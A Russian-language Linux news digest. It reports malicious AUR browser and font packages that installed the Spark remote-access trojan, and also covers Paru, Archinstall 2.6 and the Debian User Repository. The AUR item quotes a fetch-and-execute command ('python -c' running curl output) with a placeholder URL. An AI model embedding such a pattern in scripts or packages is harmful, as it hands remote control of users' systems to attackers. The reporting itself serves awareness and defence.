В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.

В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.

Вредоносный пакет был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.

Следом было выявлено ещё три пакета с вредоносным кодом: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.

>>> Подробности

После долгой тишины обновился Paru — обёртка для pacman с интеграцией AUR.

Обновление содержит много крупных изменений, важных в основном продвинутым пользователям.

( читать дальше... )

>>> Более полный список изменений

Опубликован выпуск Archinstall 2.6. Archinstall — текстовый установщик, который входит по умолчанию в установочный образ ArchLinux с 2021 года.

( читать дальше... )

Подробности на OpenNet

>>> Подробности на GitHub

Hunter Wittenborn представил свой проект Debian User Repository. DUR это аналог репозитория AUR (Arch User Repository) для Debian, позволяющий разным людям распространять свои пакеты без включения в основные репозитории Debian. Как и в AUR метаданные и инструкции сборки пакетов в DUR определяются с использованием PKGBUILD. Для того, чтобы собрать такой пакет, нужно воспользоваться утилитой makedeb (аналог утилиты makepkg из Arch Linux). Также, имеется утилита mpm с помощью который можно производить различные манипуляции (загрузка, распаковка) с уже готовыми пакетами из AUR и репозиториев Arch Linux, а утилита makedeb-db поможет с заменой специфических зависимостей. Таким образом, пользователь дистрибутива Debian может легко скачивать и устанавливать пакеты из AUR.

DUR использует систему рейтинга, основанную на голосовании пользователей, специальные метки от проверенных участников, а также цифровые подписи разработчиков, все это в сумме должно уменьшить шанс появления недоброкачественного контента.

Количество пакетов в DUR на момент публикации: 4

DUR является личным проектом и не является официальным подпроектом Debian.

>>> Подробности